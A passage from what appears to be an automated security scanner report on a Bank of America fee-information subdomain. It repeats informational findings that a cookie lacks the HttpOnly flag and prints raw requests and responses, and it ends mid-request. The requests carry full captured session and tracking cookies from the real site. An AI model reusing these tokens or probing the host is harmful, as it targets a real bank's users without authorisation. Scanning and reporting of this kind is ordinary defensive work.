Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c20a-4b5e-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 19294
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:28 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:28 GMT;path=/

GIF89aZ.l...............................................................................................................................................................................................
...[SNIP]...

4.23. http://factsaboutfees.bankofamerica.com/assets/img/bg_widget.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/bg_widget.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:28 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/bg_widget.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/manage-credit-card-fees/transaction-fees-and-aprs/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:28 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:54 GMT
ETag: "24c1c9-64b-4ab460c951580"
Accept-Ranges: bytes
Content-Length: 1611
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:28 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:28 GMT;path=/

GIF89a.....G............................................................................................................................................................................................
...[SNIP]...

4.24. http://factsaboutfees.bankofamerica.com/assets/img/blue_square.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/blue_square.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:04 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/blue_square.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:04 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c1d9-135-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 309
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:04 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:04 GMT;path=/

GIF89a.........Pp.p..Gc.~..Po.Rr.n..a..Mk.On.l..d..f..Jg.j..Xz...q..E_.@[.l..q..@X.h..e..r..Ss.x..Ki.B^....`..[....Qr.p..C].^..[..Om.r..{.....r..v.....Li............................................
...[SNIP]...

4.25. http://factsaboutfees.bankofamerica.com/assets/img/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:23 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/favicon.ico HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:23 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c1e8-47e-4ab460cb39a00"
Accept-Ranges: bytes
ntCoent-Length: 1150
Content-Type: text/plain; charset=UTF-8
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:23 GMT;path=/
Cache-Control: private
Content-Length: 1150

............ .h.......(....... ..... .....@.............................................................................................................................................................
...[SNIP]...

4.26. http://factsaboutfees.bankofamerica.com/assets/img/feedback/blue_fb_en-US.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/feedback/blue_fb_en-US.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:03 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/feedback/blue_fb_en-US.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:03 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:54 GMT
ETag: "24c278-18f-4ab460c951580"
Accept-Ranges: bytes
Content-Length: 399
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:03 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:03 GMT;path=/

GIF89aK......o..Kg....c|..........Wr....{.................@^.................................................!.......,....K...... $.di.h..l..p,.tm.x..i.............h.aKH4.p(.&A.**0........A......j.Q.
...[SNIP]...

4.27. http://factsaboutfees.bankofamerica.com/assets/img/feedback/blue_oo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/feedback/blue_oo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:03 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/feedback/blue_oo.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:03 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c276-77a-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 1914
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:03 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:03 GMT;path=/

GIF89a.......@^..........!..NETSCAPE2.0.....!.. ,...,..........(.!.+g.........].y\..J......7..K.U...x.N..!.. ....,..........*......b|.*j%.u3.._g.Zy9N.r...f8.pV......(..!.. ....,..........$.!.r....rF..
...[SNIP]...

4.28. http://factsaboutfees.bankofamerica.com/assets/img/ico-alerts.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/ico-alerts.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:04 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/ico-alerts.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; 